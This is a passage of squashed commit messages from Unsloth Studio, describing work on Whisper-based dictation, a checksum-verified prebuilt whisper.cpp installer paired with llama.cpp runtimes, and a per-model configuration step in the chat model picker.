The current selection was a faint background tint. It now uses the accent
background with a medium weight name. Two line rows use a small corner
radius; single line custom repo rows keep the pill shape.
* Address review feedback on STT snapshot checks, VRAM release, and dictation UX
Verify snapshot completeness in the load preflight so a partial download
fails before the audio is decoded, for curated and custom repos alike.
Drop the failed accelerator traceback before the CPU retry so the cache
clear can actually release that memory. Keep unloading the GGUF sidecar
after cancelling an in-flight Transformers load; both engines can hold
memory at once. Allow Auto language with English-only .en checkpoints,
matching the backend which sends no forced language. Keep the discard
button usable while a transcription is pending so a slow or hung request
cannot trap the composer in dictation mode. Stop linking Compare and
settings test dictations to the unrelated active single chat thread.
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to the traceback, so dropping it from the caught exception was not
enough to release the failed accelerator load during the retry. Leaving
the handler before clearing the cache works on every supported version.
* Address review feedback on session handoff, chat pinning, and server lifetime
Starting a dictation from a second entry point now cancels the session
it replaces, so the old recording cannot keep the microphone open or
save a transcript with no discard button pointing at it. The linked
chat is pinned when recording starts, so switching threads while a
transcription finalizes cannot relink the transcript to the newly
opened chat. whisper-server is now bound to Studio's lifetime like the
other long-lived children: PDEATHSIG on Linux, the parent job object on
Windows, and pid adoption so the shutdown sweep reaps it; before this
it survived a Ctrl+C exit as an orphan still holding the model.
* Remove the dictation mic test from Voice settings
The composer dictate button covers the same check, so the test row, its
transcript panel, the unsupported fallback row, and their strings and
search entry are gone.
* Studio STT: gate GGUF whisper-server on training and fix dictation retry and dictionary edits
GGUF (whisper.cpp) sidecar:
- Launch whisper-server with --no-gpu while training is active, mirroring the Transformers sidecar's CPU device choice, so a mid-training dictation cannot reclaim the VRAM training just freed.
- Report is_loading() during whisper-server startup so training VRAM admission accounts for the accelerator memory it is about to bind.
- Require PyAV in is_available() so /audio/stt/status reports the engine unavailable when uploads cannot be decoded, instead of loading fine and then 501ing at transcription.
- Reject a missing model before decoding audio, matching the Transformers download preflight.
Voice settings:
- The download Retry button now restarts the download; the sidecar error is sticky until a new start(), so re-polling alone never cleared it.
Dictation dictionary:
- Tabbing from an emptied entry to its remove button no longer commit-splices the row first, which shifted indices and deleted the wrong entry.
* [pre-commit.ci] auto fixes from pre-commit.com hooks
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* Studio STT: fix curated GGUF whisper filenames to match hosted repos
The unslothai/whisper-*-GGUF repos host the checkpoint as whisper-<id>.bin,
not ggml-<id>.bin, so every curated dictation download and cached-path
lookup 404'd and the whisper.cpp engine could never load a model. Point
GGML_STT_MODELS at the real filenames and guard the naming with a test.
* Studio STT: validate a custom dictation repo before downloading it
The Transformers STT engine accepts an arbitrary owner/model repo, but the
download route handed it straight to snapshot_download, pulling a possibly large
non-Whisper repository into the shared HF cache. Confirm the repo is a Whisper
checkpoint first with the existing metadata-only validate_remote_model (no
weights); curated ids short-circuit and the GGUF engine (curated-only) is
unaffected. A non-Whisper repo now 422s before any download.
* Studio STT: preempt a still-loading GGUF server for training admission
A whisper-server still in its startup window binds accelerator memory but has no
loaded_model yet, so training admission could miss it and launch into an OOM.
Make the GGUF startup cancellable (cancel_pending_load signals an abort event and
terminates the starting process without the load lock; _wait_for_server observes
it and raises SttLoadCancelledError; wait_for_load_to_settle blocks on the lock
until the killed server is reaped), and always fold the GGUF sidecar into the
resident-STT summary so a resident Transformers model cannot mask a loading GGUF
server. free_stt_model_for_training now cancels an in-flight load and waits for it
to settle before training claims the memory.
* [pre-commit.ci] auto fixes from pre-commit.com hooks
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* Studio STT: fall back to Transformers when whisper-server is absent
A curated dictation model (including the default small) hard-pinned the GGUF
engine, but standard installs do not ship whisper-server, so every recording
501'd instead of using the Transformers engine that serves the same checkpoint
-- the GGUF sidecar's own documented contract. Add _resolve_serving_stt_engine:
a GGUF request for a curated id (the only ids GGUF accepts, all Transformers-
servable) downgrades to Transformers when whisper-server is unavailable, applied
consistently to download, load and transcribe (not unload, which targets a
specific engine). The Voice tab likewise falls back to the Transformers status so
the model is not shown unavailable and download is not blocked.
* Studio STT: hide custom Whisper caches from the legacy model pickers
The legacy /cached-models (and /cached-gguf) routes called is_hidden_model with
only the owner/model id, which cannot reach the config-based Whisper check, so a
downloaded custom (non-curated) Whisper checkpoint was still offered as a chat
model. Pass the cached snapshot path so _path_is_whisper_model inspects the repo
config and hides it, matching the discovery route.
* Studio STT: hide GGUF dictation repos, lock-free status, unload fallback, split training eviction
- Hide the curated GGUF dictation repos (unslothai/whisper-*-GGUF) from the chat
model inventory and pickers, backend and frontend. Only their Transformers
safetensors companions were hidden; the GGUF repos use a different org and a
-GGUF suffix and carry a raw .bin with no whisper config.json, so they leaked
into chat pickers.
- Make the GGUF sidecar loaded_model/device accessors lock-free, mirroring the
Transformers sidecar. transcribe() holds self._lock across the whole inference
call, so /audio/stt status polls and training admission previously blocked
behind an in-flight transcription.
- stt_unload resolves through the serving resolver: a "gguf" pick on a host
without whisper-server is served by the Transformers fallback, so unload must
target that engine or the resident model is never freed. Unload also attempts
every engine even if one raises, so a failure freeing one backend no longer
skips the other.
- free_stt_model_for_training frees the Transformers and GGUF sidecars under
independent exception boundaries so a failure unloading one no longer skips
the other before training claims the memory.
Adds tests/test_stt_review_fixes.py covering all four.
* Studio STT: resolve Auto dictation language for the model engine + snapshot process liveness
- The model dictation adapter sent the raw setting (the literal "auto") to the
backend, while the browser engine resolves Auto via resolveDictationLanguage.
A batch of non-English voice notes came back mostly English on Auto. Add
resolveModelDictationLanguage: only the literal "auto" is resolved to a
concrete locale, gated so it becomes a language the model AND Whisper can
honor (mirroring the backend's known-whisper-languages set); an explicit
language, or a locale Whisper cannot honor, stays unchanged/auto-detect. Wire
it into both adapter call sites.
- GgmlSttSidecar._process_alive() read self._process twice; a concurrent
unload() nulls it under the lock while loaded_model/device read lock-free, so
a null between the two reads called None.poll(). Snapshot once. Adds a
deterministic regression test.
* studio: tighten comments and docstrings in the dictation modules
* studio: harden dictation model downloads, GGML readiness, and recording paths
Address review findings on the STT dictation feature:
- build_whisper_cpp.sh refuses to delete a whisper.cpp tree under a custom
Studio home unless it carries the Studio ownership marker, matching the
setup.sh policy, and marks trees it creates
- _snapshot_is_complete validates every shard of a sharded PyTorch
(pytorch_model.bin.index.json) checkpoint like the safetensors path, and
requires tokenizer assets (tokenizer.json or vocab.json + merges.txt)
- custom-repo downloads pin the revision resolved at validation time and
restrict snapshot_download to the model/tokenizer/config/preprocessor file
classes Studio loads
- the GGML sidecar holds its port reservation until just before spawning
whisper-server and only accepts readiness from a responder that both looks
like whisper.cpp's server and belongs to the still-running managed child,
probing twice, so mic audio cannot be posted to a foreign local process
- the recording adapter transcribes every non-empty segment; the RMS meter
only shapes segment boundaries and can no longer discard quiet speech
- Compare-pane dictation can cancel a pending transcription on second click,
with the button relabeled while finalizing
- localStorage quota recovery halves the dictation history until the save
fits, so small histories shrink too
- the System default TTS voice resolves to the platform default voice
- new dictation UI imports go through the chat and hub feature barrels
Regression tests cover the build-script gate, sharded PyTorch and tokenizer
completeness, revision pinning and allow patterns, and the whisper-server
readiness probe.
* Fix STT download and voice picker follow-ups
* [pre-commit.ci] auto fixes from pre-commit.com hooks
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* Add dictation button regression coverage
* Studio: prebuilt whisper.cpp via the shared llama.cpp install core, slim bundles paired to the llama prebuilt (#7294)
* Studio STT: add prebuilt whisper.cpp (whisper-server) installer
New install_whisper_prebuilt.py downloads a per-platform whisper-server
bundle published by the unslothai/whisper.cpp prebuilt CI into the managed
whisper.cpp dir (build/bin/whisper-server) so local dictation needs no
compiler. Mirrors install_node_prebuilt.py / install_llama_prebuilt.py:
host + backend detection, sha256 pins (whisper_prebuilt_pins.json) as the
trust anchor, staging + install lock + atomic swap, traversal-safe extract,
co-located shared libs (RUNPATH=$ORIGIN), an UNSLOTH_WHISPER_PREBUILT_INFO.json
marker with idempotent "already matches", and exit codes 0/1/2/3. Not wired
into setup yet; the pins ship empty so every asset fails closed until the
first fork release is published and its digests are reviewed in.
* Studio STT: install prebuilt whisper.cpp during setup and update
Add a fail-open whisper.cpp block to setup.sh after the llama.cpp section so
`unsloth studio update` (and a fresh install) fetch the prebuilt whisper-server
into the managed whisper.cpp dir the sidecar discovers. It skips a user-set
WHISPER_SERVER_PATH/UNSLOTH_WHISPER_CPP_PATH, honors UNSLOTH_SKIP_WHISPER_INSTALL,
forwards the resolved ROCm gfx, and never aborts setup: a busy install keeps the
existing runtime, and an unavailable prebuilt stays quiet (source build is opt-in
via UNSLOTH_WHISPER_FORCE_COMPILE) since Transformers STT and browser dictation
remain. Register UNSLOTH_WHISPER_PREBUILT_INFO.json as Studio-owned evidence.
* Studio STT: harden whisper-server child env + WSL ROCm detection
- Sidecar spawns whisper-server with a scrubbed child env that prepends the
binary dir (co-located GPU libs) to the loader path, and on WSL2 ROCm loads
the system HIP first (HSA_ENABLE_DXG_DETECTION=1) so a bundle's bare-metal HIP
does not segfault on /dev/dxg. Secret-bearing vars are dropped from the child.
- find_whisper_server_binary now requires an executable, not just a file.
- Installer rocm probe passes HSA_ENABLE_DXG_DETECTION and falls back to
/opt/rocm/bin/rocminfo so a WSL ROCm host is not misdetected as CPU-only;
gfx parsing skips the gfx000 CPU agent and generic ISA lines.
- Tests for the child env (secret scrub, lib dir, WSL HIP precedence), the
executable check, and the WSL rocm detection.
* Studio STT: in-app whisper.cpp prebuilt update stack + ship pins in the wheel
Mirror the llama.cpp update stack for the whisper.cpp prebuilt so Studio can
detect and install a newer whisper-server release from inside the app:
- backend/utils/whisper_cpp_freshness.py: read UNSLOTH_WHISPER_PREBUILT_INFO.json
and compare the installed release against the newest unslothai/whisper.cpp
release. Whisper tags are v<upstream>-unsloth.<N>, so is_behind compares a
(major, minor, patch, serial) key with a strict downgrade guard; 24h cache;
fail-open.
- backend/utils/whisper_cpp_update.py: run install_whisper_prebuilt.py to fetch
and atomically swap the newest bundle, unloading the warm GGUF sidecar first.
- backend/routes/whisper.py mounted at /api/whisper (update-status + update).
- pyproject: add whisper_prebuilt_pins.json to studio package-data so the
installer's trust anchor ships in the wheel (it is a data file, not a .py
module, so package discovery alone does not include it; node_prebuilt_pins.json
is listed for the same reason). Without this a pip-installed wheel had no pins
and the prebuilt install aborted to Transformers STT.
Adds test_whisper_cpp_freshness.py (version parser, is_behind matrix + downgrade
guard, marker layouts, stale decision, fail-open).
* Studio STT: verify whisper prebuilts via the release checksum index, like llama.cpp
Re-align the whisper.cpp prebuilt installer to install_llama_prebuilt.py's trust
model: instead of a committed whisper_prebuilt_pins.json, verify every download
against the release's own whisper-prebuilt-sha256.json checksum index, fetched
from the same GitHub release.
- parse_release_checksums / fetch_release_checksums / expected_sha256_for replace
the pins layer. The index is validated for schema/component and that its
release_tag matches the resolved release; an asset absent from it, a release
that does not publish it, or a manifest sha256 that disagrees with it all fail
closed to a source build.
- resolve_release_tag now resolves the newest published release at runtime (or an
explicit --published-release-tag), matching llama and the freshness check;
removed the pinned-default and the UNSLOTH_WHISPER_ALLOW_UNVERIFIED opt-in.
- Delete studio/whisper_prebuilt_pins.json and drop its pyproject package-data
entry (nothing to ship now, same as llama which has no committed pins).
- Adds test_install_whisper_prebuilt_checksums.py (index parser, fail-closed on
uncovered asset, tampered-manifest guard, newest-release resolution).
This is a same-origin checksum (integrity, not authenticity), identical to the
llama.cpp installer; pair releases with GitHub artifact attestations for provenance.
* Resolve whisper prebuilt release via the download host (no GitHub API)
Mirror install_llama_prebuilt.py's fast path: resolve the release tag from
the releases/latest redirect and fetch the manifest + checksum index from
constructed releases/download URLs, so the common install path makes zero
api.github.com calls (unauthenticated api.github.com is capped at 60 req/hour
per IP; the download host is not). Fall back to the GitHub API only on a 404,
malformed asset, or tag mismatch.
* Studio STT: coverage-aware whisper prebuilt selection via a shared core
whisper's select_artifact returned the first os/arch/backend manifest match and
ignored the SM-coverage fields the release manifest already carries, so a
Blackwell B200 (sm_100) was served cuda12-legacy (sms 50-61) -- runnable only via
forward PTX JIT. install_llama_prebuilt.py on the same host correctly picks
cuda13-newer.
Extract the coverage-aware selection into a shared, component-agnostic core under
studio/backend/utils/prebuilt/ (selection + GPU host-capability detection), lifted
from llama's linux_cuda_choice_from_release / _artifact_covers_sms / _sm_range and
generalised over a normalised artifact. whisper's HostInfo now records the GPU
compute caps + driver CUDA version (honoring CUDA_VISIBLE_DEVICES), and
select_artifact routes CUDA/ROCm through the shared selector: every visible SM
must be covered, the tightest-covering profile wins (Blackwell-aware runtime-line
ordering), ROCm matches the gfx target exactly, and an uncovered GPU falls back to
the CPU bundle. CPU/Metal/Vulkan keep first-match. The resolver JSON, exit codes,
and "already matches" contract are unchanged.
On the B200 the installer now resolves cuda13-newer, matching llama.
* Studio STT: gate whisper CUDA selection on the on-disk runtime, like llama
The prebuilt CUDA bundles are dynamically linked and intentionally do NOT ship
libcudart/libcublas -- they load the same runtime the host already has. So the
driver's advertised CUDA version is only an upper bound: a cuda13 bundle still
needs cuda13 runtime libraries present on disk. Port llama's on-disk runtime
scan (detected_linux_runtime_lines / detected_windows_runtime_lines) into the
shared core and intersect it with the driver-compatible lines in
select_cuda_attempts. A host with a cuda13 driver but only cuda12 runtime (e.g.
torch-cuda12) now correctly gets a cuda12 bundle instead of an unloadable cuda13
one; a host with no CUDA runtime at all falls back to CPU.
Fixes a glob bug in the port (any(Path(d).glob(p) for d in dirs) tests generator
truthiness, not a match) that made every major report present; add a real
filesystem test that exercises the scan.
* studio: harden shared prebuilt core to full llama parity
Apply the review findings on the shared coverage-aware prebuilt-consumer
core so whisper.cpp selection is exactly equivalent to the llama.cpp path.
hosts.py: port llama's CUDA_VISIBLE_DEVICES handling. A GPU hidden by an
index/UUID selector now reports has_usable_nvidia False instead of staying
usable, via supports_explicit_visible_device_matching plus the physical /
explicit-match branches, and _select_visible_rows now matches rows the way
llama does (index or UUID, gpu- prefix optional) and skips unmatched tokens
rather than keeping all rows. Adds the Linux /proc/driver/nvidia/gpus
fallback and has_physical_nvidia. Adds parse_macos_version.
runtime_libs.py: the Linux on-disk scan now requires the exact libcudart /
libcublas SONAME (libcudart.so.13), not a libcudart.so.13* glob, so a bare
versioned file without the SONAME symlink no longer counts as loadable.
Hardens the ldconfig parse against an empty left-hand side.
selection.py: fix the Blackwell/torch reordering so it keys on the covering
runtime lines (falls through to the torch preference when the covering lines
were filtered out), matching linux_cuda_choice_from_release. Corrects the
compatible_runtime_lines_for_driver docstring: the bundles do not ship the
CUDA runtime, so the driver version is only an upper bound and the caller
must intersect with the on-disk scan.
install_whisper_prebuilt.py: enforce a macOS artifact's min_os (new
HostInfo.macos_version) so a bundle that cannot load on the host OS version
is dropped. Keep resolver stdout to only the JSON line by leaving logs on
stderr in --resolve-prebuilt mode, and map an unexpected probe failure to
prebuilt_available False instead of a traceback.
Tests: new host-probe suite for the visible-device logic, exact-SONAME
runtime-scan cases, macOS min_os filtering, resolver stdout-only-JSON,
exit-code mapping, and the repo key.
* studio: fix whisper prebuilt selection + launch parity gaps from review
A parallel review surfaced integration defects where the whisper path could
select or launch a bundle that cannot run on a concrete host. Each is fixed to
match install_llama_prebuilt.py.
macOS min_os: the manifest labels macOS requirements as macos-<version>
(e.g. macos-14.0), which the version parser could not read, so the guard was a
no-op and a macOS-13 host would install the macos-14 Metal bundle. Strip the
platform prefix before parsing.
ROCm gfx detection: _detect_rocm_gfx returned the first gfx token and ignored
HIP_VISIBLE_DEVICES / ROCR_VISIBLE_DEVICES / CUDA_VISIBLE_DEVICES. Since exact
ROCm matching treats that token as the active GPU, a mixed APU + dGPU host
(gfx1151 + gfx1100) with HIP_VISIBLE_DEVICES=1 installed the wrong archive. Route
through a shared pick_rocm_gfx_target (lifted from llama) that parses per-GPU
sections and honors the visibility vars (empty / -1 -> no AMD GPU).
--rocm-gfx override: recording the arch without setting has_rocm left the host on
its CUDA/CPU path so the ROCm bundle was never picked. --rocm-gfx now implies
has_rocm and clears NVIDIA state, like llama's _apply_host_overrides.
CUDA launch env: a CUDA bundle ships the ggml CUDA backend but not
libcudart/libcublas, and the sidecar launch env exposed only the bundle dir, so
on a host whose CUDA runtime lives only in the PyTorch wheels the selection would
gate cuda usable but the server could not load it. Add the CUDA-from-PyTorch
runtime dirs to the child loader path for CUDA bundles (bundle dir still first),
mirroring binary_env.
Also normalize a manifest artifact's supported_sms defensively (parity with
llama's parser) and document that blackwell_min_toolkit_for_caps is retained for
the Phase B llama Windows path.
Not changed (verified parity, not defects): Linux/Windows min_os is enforced
nowhere in llama (macOS only); the resolver is optimistic about the checksum
index and the install path verifies.
* studio: tighten prebuilt-core code comments
* studio: lift shared prebuilt installer core out of the whisper installer
* studio: reuse the llama.cpp prebuilt installer machinery for whisper
* studio: unify llama and whisper prebuilt installers on a shared descriptor core
* studio: consolidate prebuilt installer tests into the shared core suite
Grow tests/studio/install/test_prebuilt_core.py from 62 to 164 tests so every
component-agnostic behavior runs against both descriptors: the full seven
profile CUDA release matrix (multi-GPU, on-disk runtime gating, shuffle
stability, missing SM metadata, dotted SM normalization, no-driver fallback
policy), the ROCm gfx family matrix, macOS min_os gating and its helper,
backend resolution incl. cpu-fallback precedence and Intel-mac auto detect,
checksum-index non-object and plain-lookup cases, the tar symlink/hardlink
extraction guards moved from the llama suite, and the compute-cap, visible
device, runtime-line and Blackwell helper value tables moved verbatim from
the llama characterization suites.
Delete only tests whose exact behavior the master now asserts for the same
component: 40 pure-alias helper cases in test_selection_logic.py (replaced by
value-identical master tables plus an alias-identity pin), 6 extraction moves
and the master-absorbed zip-symlink case in the llama logic suite, 3 routing
twins in test_rocm_support.py already pinned byte-for-byte in
test_selection_logic.py, the 2 Blackwell helper tables in the backend resolve
suite, 28 whisper logic tests and 10 whisper checksum tests re-asserted by
the master whisper parameterization. Wrapper wiring pins, the llama release
plan dialect, fingerprints and every llama-only behavior stay untouched.
* studio: dedupe sidecar and update helpers into the backend prebuilt package
* studio: chain whisper.cpp prebuilt updates onto the llama.cpp update flow
* studio: consume paired slim whisper prebuilts via the llama ggml runtime
* studio: serve every whisper backend from slim prebuilts
* studio: drop the whisper fat per-accelerator selection chain
unslothai/whisper.cpp releases are slim-only from v1.9.1-unsloth.2: one
ggml-less bundle per os/arch, paired to the llama.cpp prebuilt that provides
every ggml backend. Delete the whisper-side fat CUDA/ROCm/metal/vulkan
selection glue; keep slim selection + pairing, link_ggml_runtime, and one
legacy shape, the published fat CPU bundle of an explicitly pinned pre-slim
release. Exit 2 now reads as prebuilt unavailable (whisper never source
builds); setup already treats it that way.
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
* Wire libomp runtime DLL alongside ggml in slim whisper installs
llama's clang-built windows-arm64 ggml-base.dll imports
libomp140.aarch64.dll, shipped in the llama bundle but not a system DLL.
Without it next to whisper-server.exe the loader fails with
STATUS_DLL_NOT_FOUND before main. MSVC x64 links vcomp140.dll from
System32 and Linux ggml uses system libgomp.so.1, so only windows-arm64
was affected. The empty-runtime guard still requires a real ggml
library; libomp alone is not a pairing.
* studio: drop whisper-side fat-selection support structure
Slim whisper bundles are selected per os/arch only; all accelerator
capability comes from the installed llama.cpp prebuilt, whose installer
already did the coverage-aware selection. Remove the machinery that only
existed to pick among fat per-accelerator whisper bundles:
- prebuilt_core: delete the generic CUDA/ROCm coverage selection
(select_cuda_artifact, select_rocm_artifact, ArtifactView adapters,
detected_cuda_runtime_lines, the exact-SONAME linux probe) that no
shipped component routes through; llama keeps its own selection chain
and whisper shadows select_artifact with the slim-only version.
select_artifact is now a plain os/arch/backend first-match.
- install_whisper_prebuilt: drop the HostInfo CUDA fields
(compute_caps, driver_cuda_version, torch_runtime_line) and the torch
runtime probe that populated them; nothing reachable reads them, and
the resolver payload sources runtime_line from the artifact.
- whisper_cpp_update: delete the standalone start_update job worker;
whisper applies only run as the chained phase of the combined
llama+whisper update. The status payload keeps its job field (idle).
- routes/whisper: drop the progress logger that could never fire.
- tests: remove tests of the deleted paths and tests duplicating the
descriptor-parameterized core suite or the llama freshness suite.
Contracts unchanged: resolver JSON keys, exit codes, marker fields,
pairing logs, and the pinned pre-slim fat CPU escape hatch.
* Address review feedback on the whisper prebuilt update and install paths
- Pin the chained whisper phase to the release the freshness check
offered, so the download-host latest pointer cannot reinstall an
older build in a loop
- Wire the whisper prebuilt install into setup.ps1 (Windows setup
previously skipped it entirely)
- Treat a non-executable server or missing wired ggml libraries as a
broken install instead of reporting already matches
- Keep whisper sidecar reloads out of the job-level reload flag and
resync chat state after a partial chained update that unloaded llama
- Repoint home and profile vars for the whisper-server subprocess at a
managed scratch dir and drop credential-store pointers
- Clear the prebuilt marker before the opt-in source build overwrite
- Write the prebuilt marker with explicit utf-8 encoding
* Tighten comments in the whisper prebuilt consumer
* Harden the Windows whisper setup phase and the chained update edges
- setup.ps1: honor WHISPER_SERVER_PATH / UNSLOTH_WHISPER_CPP_PATH /
UNSLOTH_SKIP_WHISPER_INSTALL, run the custom-home ownership guard
before the atomic install, and forward the release-tag pin and ROCm
hints like setup.sh
- sidecar: a cpu-selected install launches whisper-server with --no-gpu
(slim wiring links every llama backend, so the flag is what keeps a
deliberate CPU choice off the GPU)
- chained update: leave whisper unpinned on macOS (the llama phase can
walk back there, and a newest-tag pin could be an impossible pairing
on every retry) and treat installer exit 2 as kept-existing-runtime
instead of failing the combined job
- job.to_tag now comes only from the llama phase, so a whisper-only
round cannot report a llama update that never ran
* Fix slim whisper runtime follow-ups
* Address remaining whisper update reviews
* [pre-commit.ci] auto fixes from pre-commit.com hooks
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* Address remaining prebuilt update reviews
* Fix remaining chained update reviews
* Fix remaining whisper runtime review edges
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Adds a configurable Hugging Face model download cache location to Unsloth Studio, selectable from Settings, with per-cache download manifests, scoped deletion, and read-only inventory of previously selected caches.
Batched generation: /images/generate takes a prompts list (one image per
prompt, txt2img only) or a seeds list (one prompt, one image per seed);
the legacy batch_size path derives per-image seeds base..base+n-1 like
the native engine. Every image gets its own torch.Generator so any batch
member replays alone from its gallery recipe; the whole list runs as one
forward by default with OOM backoff that halves a failed chunk, and an
explicit batch_size caps images per forward. Validated 10-22x over
serial engines on 32-image suites with LPIPS deltas within 0.002.
Conditioning cache on the inference path: UNSLOTH_DIFFUSION_COND_CACHE_DIR
(the inference sibling of the trainers' cond_cache_dir, same persistent
store) wraps encode_prompt so repeated prompts skip the text-encoder
forward entirely; verified bit-identical outputs. Bypassed while LoRA
adapters are attached; tensor-argument calls pass through uncached.
Compile cache: GGUF loads fingerprint their own bundles (quant=gguf, a
different compiled graph than the dense family) and batched calls
register every distinct (w, h, batch) chunk shape they ran, so the heavy
GGUF batched warmups (~159 s at batch 32 on 12B-class, ~655 s on 20B
CFG-batched) are paid once ever.
GGUF loader: strip the sd.cpp model.diffusion_model. container prefix in
the single-file converter; diffusers' FLUX.2 converter KeyErrors on it
and the Qwen-Image identity mapping strands the model on meta.
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- finish_run: add clear_output_dir flag; preserve output_dir for stopped/error
unless cancel explicitly clears it (fixes pump finalization wiping persisted path).
- training pump: pass interrupted stop-and-save context into finalize_run_in_db.
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- Only skip MLX stop checkpoint write when checkpoint-{current_step} exists;
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* fix(studio): replay null resume targets
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* refactor(studio): move chat model picker into features/model-picker
Relocate model-selector + its support files from components/assistant-ui
into a self-contained features/model-picker feature (own barrel), mirroring
the modular Hub layout. Pure move + import repoint; no behaviour change.
* feat(model-picker): add per-model config persistence layer
Superset PerModelConfig (customContextLength, kvCacheDtype, speculativeType,
specDraftNMax, tensorParallel, chatTemplateOverride, trustRemoteCode) persisted
to localStorage (unsloth_model_configs) with schema versioning + LRU budget.
KV-dtype and speculative value sets match main's sidebar (no q4_0/ngram-simple).
Reuses features/hub/lib/model-identity for normalization; adds storage-key layer
and applyPerModelConfigToRuntime (sets tensorParallel, which the old PR omitted).
* feat(picker): modular backend for chat-template validate + default fetch
New studio/backend/picker package (schemas/service/routes) mounted at /api/picker:
- POST /api/picker/validate-chat-template (Jinja syntax validation, no false positives)
- GET /api/picker/chat-template/{model_name} (default template from tokenizer_config.json,
reusing get_cache_path/resolve_cached_repo_id_case; graceful null, no model-code exec)
Frontend api/templates.ts client + hooks/use-model-defaults lazy cache. No backend
changes to the existing inference load route (per-model load fields already supported).
* feat(model-picker): bind picker on-device list to shared hub inventory
Picker now sources cached + local models from useHubInventory (the Hub's shared
store) via a thin adapter, replacing its own /api/models/* fetchers + module
caches. Hub, download manager, and picker now share one source of truth, so
completed downloads reflect in the picker automatically. Partial/live-download
rows are filtered from the cached lists (unchanged rendering). Local naming/search
preserved via additive LocalInventoryRow modelId/displayName. Variant expander,
scan-folder management, recommended-fit, search, external providers untouched.
Known minor: cached 'Downloaded date' sort tiebreak degrades to alphabetical
(hub cached rows carry no mtime); default 'recent' (load-time) sort preserved.
* feat(model-picker): per-model config step inside the picker
Picking a (non-external) model now opens an in-picker config view built from
main's current load controls (context length, KV cache dtype, speculative
decoding, draft tokens, tensor parallel) plus a chat-template editor backed by
the picker validate/default endpoints. 'Remember for this model' persists the
config per model+variant; Run forwards the config to the existing load flow via
meta.config. External models bypass the step. Two-view orchestration lives in
model-selector (single interception point); pickers.tsx call sites untouched.
trustRemoteCode dropped from PerModelConfig to preserve main's per-load consent.
* feat(chat): apply/persist per-model config through the load flow
handleCheckpointChange threads meta.config into the selection; stageOrLoad and
the autoload/Hub-run paths now apply the picker config (explicit pick or saved
remembered config) via applyPerModelConfigToRuntime before staging/loading, with
keepSpeculative set so a remembered speculative mode survives the model switch.
Replaces the old remembered-load-settings seeding (resolveInitialConfig now the
single source). SelectedModelInput carries config.
* refactor(chat): remove per-model load config from the right sidebar
The load knobs (context, KV cache, speculative, draft tokens, tensor parallel)
and the chat-template editor now live only in the picker config step. The sheet's
Model section keeps the staged Load/Cancel flow (config is applied at pick time);
sampling params, system prompt, and RAG are unchanged. Deletes the superseded
remembered-load-settings module + the store's applyRememberedLoadSettings action,
removes the now-dead sheet state/imports, and points the settings reset at
unsloth_model_configs. Delete-cleanup deferred (stale config is LRU-capped).
* fix(model-picker): remove leftover sidebar-staging cogwheel + empty Model section
The downloaded-variant gear (ModelLoadSettingsAction) staged a model straight
into the right-sidebar Run-settings flow -- the old 'configure before load' path
now fully replaced by the in-picker config step. Removed the gear + its component.
Also gate the sheet's 'Model' section to staged picks only (pendingSelection):
after the load-knob strip its content is staged-only, so it was rendering an
empty section header whenever a model was merely loaded.
* chore(chat): remove dead per-model-config setters + modelControlsDisabled
After the load-config UI moved into the picker, the store's per-model setters
(setKvCacheDtype/setSpeculativeType/setSpecDraftNMax/setTensorParallel/
setCustomContextLength/setChatTemplateOverride) had zero callers
(applyPerModelConfigToRuntime writes via setState), and the sheet's
modelControlsDisabled was unreferenced. Verified dead across the whole tree.
* fix(chat): config-step Load actually loads (ignore Load-on-selection)
Root cause: with Settings > Chat > 'Load on selection' turned OFF, the config
step's load went down the deferred-staging path -- opening the right sidebar with
'<model> is staged, not loaded yet / Choose Load model'. The in-picker config step
IS the deliberate load action, so its Load now loads immediately (or downloads +
auto-loads when not cached) regardless of the toggle. Renamed the button
'Run model' -> 'Load model' to match. Native/dropped picks still honor the toggle.
* refactor(chat,hub): retire 'Load on selection' — config step is the only load flow
The in-picker config step (and the Hub Run button) now fully supersede the old
stage-to-sidebar flow, so the Load-on-selection toggle is removed everywhere:
- chat stageOrLoad: every pick loads immediately, or downloads + auto-loads when
not cached (the previous default behaviour, now universal).
- hub Run: drops the stage branch; downloaded GGUFs load directly with their saved
per-model config (no collision with the chat config step — both end at selectModel).
- store: removed loadOnSelection field/setter/key/default; Settings>Chat toggle and
its settings-reset entry removed.
- staged sidebar section is now a download-progress view (auto-loads on completion).
No manual staging remains; stageModel is used only for background auto-load downloads.
* feat(model-picker): default chat template from GGUF + thread variant through config flow
Read the embedded tokenizer.chat_template from GGUF files (read_gguf_chat_template
in gguf_metadata) and use it as the per-model default. Plumb gguf_variant through
the picker service, /api/picker/chat-template route, frontend templates API, and
use-model-defaults so the right variant's template is fetched.
Also refine the picker config-page/model-selector wiring, drop the dead
ggufNativeContextLength runtime path, and add the per-model-config storage keys to
the settings prefs export.
* feat(model-picker): read safetensors chat template + hide editor where it has no effect
Resolve the default chat template for safetensors models: prefer the modern
chat_template.jinja, fall back to the tokenizer_config.json chat_template field,
then chat_template.json (multimodal processor), then the GGUF embedded template.
Applied to local dirs, the HF cache snapshot scan, and the HF remote fetch.
Hide the chat-template editor in the picker for safetensors models — the override
is only applied at load by the GGUF/llama.cpp backend, so editing it on safetensors
currently has no effect. GGUF keeps the editor. Nothing removed; the dialog stays
for when the safetensors apply path is wired up in a later branch.
* fix(model-picker): set legacy-migration flag only after the write succeeds
Set unsloth_model_configs_migrated only once writeMap confirms the migrated
map persisted, so a quota/storage failure no longer marks migration done and
silently drops the user's pre-existing remembered settings — the next load retries.
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* MVP model picker fixes
* MVP picker config fix
* MVP safetensors config
* MVP max seq config
* MVP max seq fix
* Fix static max tokens cap ignoring model context
* Fix picker GGUF scan parity
* fix(studio): harden model picker config loading
Apply remembered per-model configs consistently from picker and Hub loads, keep default configs from overriding standing speculative settings, add config access for direct local GGUF files, and support saving or forgetting active model settings without a reload.
* Fix model picker config flow
* Fix model picker config loads
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* Avoid recursive per-model config migration reads
* Apply the displayed context length when loading a GGUF
* Fix template validation, cached template lookup, and failed load rollback
- Validate chat templates with the loopcontrols extension so templates
that use break or continue tags pass the picker validator, matching the
inference renderer that already accepts them.
- Read the default chat template from the newest cache snapshot rather than
an arbitrary iterdir order, so an older cached revision no longer prefills
a stale template.
- Capture the runtime per-model config before a load and reapply it when the
load fails, so a failed switch leaves the active model context, KV cache,
template, and speculative settings as they were.
* Make chat template view only for safetensors models
Custom chat template overrides are applied at inference only for GGUF
models, which pass the template to llama-server. The safetensors backend
renders with the model built-in template and ignores the override, so
editing it would save a value that never loads. For safetensors the
config page now opens the template as a read-only preview with a note
that editing is not available yet. This can become editable once
